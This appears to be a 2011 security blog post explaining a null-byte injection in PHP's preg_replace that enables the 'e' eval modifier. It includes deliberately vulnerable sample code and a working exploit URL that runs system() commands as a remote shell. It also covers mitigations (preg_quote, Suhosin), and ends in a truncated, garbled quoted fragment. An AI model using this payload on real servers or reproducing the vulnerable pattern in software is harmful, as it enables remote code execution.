Wednesday, June 29, 2011

Null Byte Injection in preg_replace()

When reviewing some PHP code, I came across a real world example of a strange and undocumented (but it's been breifly mentiond in MOPS Submission 07) feature/bug in the function preg_replace. On certain systems, preg_replace seems to be vulnerable to a null byte injection. If both the first and second argument is derived from user input this could lead to a remote code execution.

Preg_replace naturally has the ability to evaluate it's second argument as PHP code if the "e" modifier is present in the pattern in it's first argument. But preg_replace is very strict regarding the syntax of supplied patterns. Normally there should be no way to escape from in between the "/" delimiters and inject the "e" modifier when the pattern is derived from user input, like in this example. $pattern = '/omfglol'.$_GET['mypattern'].'/i'; $replacement = $_GET['replacement']; $subject = 'omglolomglolnostop'; echo preg_replace($pattern,$replacement,$subject); If you'll try to exploit this by injecting "test/e" into the middle of the pattern "/omfgloltest/e/i". The "/" that is present after "/e" in the pattern is not considered to be a valid modifier and an error will be thrown. "Warning: preg_replace(): Unknown modifier '/'"

Lets have a look in PHP's source code. The, as of now, Current stable PHP 5.3.6. This is line 337 to 374 of ext/pcre/php_pcre.c containing the loop responsible for parsing modifiers in a pattern. /* Parse through the options, setting appropriate flags. Display a warning if we encounter an unknown modifier. */ while (*pp != 0) { switch (*pp++) { /* Perl compatible options */ case 'i': coptions |= PCRE_CASELESS; break; case 'm': coptions |= PCRE_MULTILINE; break; case 's': coptions |= PCRE_DOTALL; break; case 'x': coptions |= PCRE_EXTENDED; break; /* PCRE specific options */ case 'A': coptions |= PCRE_ANCHORED; break; case 'D': coptions |= PCRE_DOLLAR_ENDONLY;break; case 'S': do_study = 1; break; case 'U': coptions |= PCRE_UNGREEDY; break; case 'X': coptions |= PCRE_EXTRA; break; case 'u': coptions |= PCRE_UTF8; /* In PCRE, by default, \d, \D, \s, \S, \w, and \W recognize only ASCII characters, even in UTF-8 mode. However, this can be changed by setting the PCRE_UCP option. */ #ifdef PCRE_UCP coptions |= PCRE_UCP; #endif break; /* Custom preg options */ case 'e': poptions |= PREG_REPLACE_EVAL; break; case ' ': case '\n': break; default: php_error_docref(NULL TSRMLS_CC,E_WARNING, "Unknown modifier '%c'", pp[-1]); efree(pattern); return NULL; } }
On line 339, the while loop loops until it encounters a null byte. So if "test/e" is followed by a null byte PHP will stop searching for other modifiers beyond that.

To turn the PHP example in the beginning of this post into a remote command shell one would use an url like this: http://www.example.com/pregvuln.php?mypattern=||/e%00&replacement=system($_GET['cmd']);&cmd=echo%20testing123

Note: The double pipes "||" in the pattern "||/e" makes it match anything. The pattern must match something or the code won't execute.

Edit: My initial tests where distorted by the Suhosin patch, which also protects the server from this type of attack.
All PHP versions, as of today, is vulnerable to this attack.


To defend against this type of attack, just follow best practice. User input should always be escaped using preg_quote before being used in a regexp pattern.

This is a secured version of the example in the beginning of this post. $pattern = '/omfglol'.preg_quote($_GET['mypattern'],'/').'/i'; $replacement = $_GET['replacement']; $subject = 'omglolomglolnostop'; echo preg_replace($pattern,$replacement,$subject); Or to defend against this at the server level, install Suhosin.


    However, even if there is no “e” modifier sometimes attackers still have possibility to evaluate code. It can be achieved by dropping off some part of regexp by putting null-byte into it. Let’s look at the same example, but a little bit modified:

    (.*?)$regexp<\/tag>/", '\\1', $var);
    Maybe this example looks too naive, but currently aim is to show when null-byte attack could work. Now consider that vulnerable script accepts request like this:


